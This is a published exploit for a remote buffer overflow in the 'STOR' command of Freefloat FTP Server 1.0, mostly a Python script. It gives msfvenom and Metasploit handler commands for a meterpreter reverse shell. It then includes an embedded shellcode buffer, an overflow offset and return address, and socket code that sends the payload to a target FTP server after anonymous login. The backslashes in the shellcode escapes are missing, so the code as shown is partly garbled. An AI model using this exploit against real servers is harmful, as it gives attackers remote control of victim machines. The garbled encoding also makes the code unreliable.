Freefloat FTP Server 1.0 – ‘STOR’ Remote Buffer Overflow

# Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow
# Google Dork: N/A
# Date: 4/26/2019
# Exploit Author: Kevin Randall
# Vendor Homepage:
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: Firmware: Free Float FTP 1.0
# Tested on: Windows XP Professional Service Pack 2
# CVE : N/A

#Generate Shellcode with MSFVenom
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP.OF.LOCAL.MACHINE LPORT=4444 -b 'x00x0Ax0D' -f python
#Setup listener "use exploit/multi/handler" "set payload windows/meterpreter/reverse_tcp" "set LHOST IP.OF.LOCAL.MACHINE" "set LPORT 4444" "exploit"

#!/usr/bin/python

import socket
import sys

buf =  ""
buf += "xbax99x2cxb1x7dxdbxd1xd9x74x24xf4x5dx2b"
buf += "xc9xb1x56x31x55x13x83xedxfcx03x55x96xce"
buf += "x44x81x40x8cxa7x7ax90xf1x2ex9fxa1x31x54"
buf += "xebx91x81x1exb9x1dx69x72x2ax96x1fx5bx5d"
buf += "x1fx95xbdx50xa0x86xfexf3x22xd5xd2xd3x1b"
buf += "x16x27x15x5cx4bxcax47x35x07x79x78x32x5d"
buf += "x42xf3x08x73xc2xe0xd8x72xe3xb6x53x2dx23"
buf += "x38xb0x45x6ax22xd5x60x24xd9x2dx1exb7x0b"
buf += "x7cxdfx14x72xb1x12x64xb2x75xcdx13xcax86"
buf += "x70x24x09xf5xaexa1x8ax5dx24x11x77x5cxe9"
buf += "xc4xfcx52x46x82x5bx76x59x47xd0x82xd2x66"
buf += "x37x03xa0x4cx93x48x72xecx82x34xd5x11xd4"
buf += "x97x8axb7x9ex35xdexc5xfcx51x13xe4xfexa1"
buf += "x3bx7fx8cx93xe4x2bx1ax9fx6dxf2xddx96x7a"
buf += "x05x31x10xeaxfbxb2x60x22x38xe6x30x5cxe9"
buf += "x87xdbx9cx16x52x71x97x80x9dx2dxa7x52x76"
buf += "x2fxa8x43xdaxa6x4ex33xb2xe8xdexf4x62x48"
buf += "x8fx9cx68x47xf0xbdx92x82x99x54x7dx7axf1"
buf += "xc0xe4x27x89x71xe8xf2xf7xb2x62xf6x08x7c"
buf += "x83x73x1bx69xf4x7bxe3x6ax91x7bx89x6ex33"
buf += "x2cx25x6dx62x1axeax8ex41x19xedx71x14x2b"
buf += "x85x44x82x13xf1xa8x42x93x01xffx08x93x69"
buf += "xa7x68xc0x8cxa8xa4x75x1dx3dx47x2fxf1x96"
buf += "x2fxcdx2cxd0xefx2ex1bx62xf7xd0xd9x4dx50"
buf += "xb8x21xcex60x38x48xcex30x50x87xe1xbfx90"
buf += "x68x28xe8xb8xe3xbdx5ax59xf3x97x3bxc7xf4"
buf += "x14xe0xf8x8fx55x17xf9x6fx7cx7cxfax6fx80"
buf += "x82xc7xb9xb9xf0x06x7axfex0bx3dxdfx57x86"
buf += "x3dx73xa7x83"


shellcode = 'x90'*20 + buf
payload = "A"*247+"xF6xC1xB3x7C"+ shellcode +"C"*(749-len(shellcode))

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
##Add FTP Server IP Here###############
connect = s.connect(('192.168.0.9',21))
#######################################

s.recv(1024)
s.send('USER anonymousrn')

s.recv(1024)
s.send('PASS anonymousrn')

s.recv(1024)
s.send('STOR' + payload + 'rn')

s.recv(1024)
s.send('QUITrn')

s.close()
            

Comments are closed.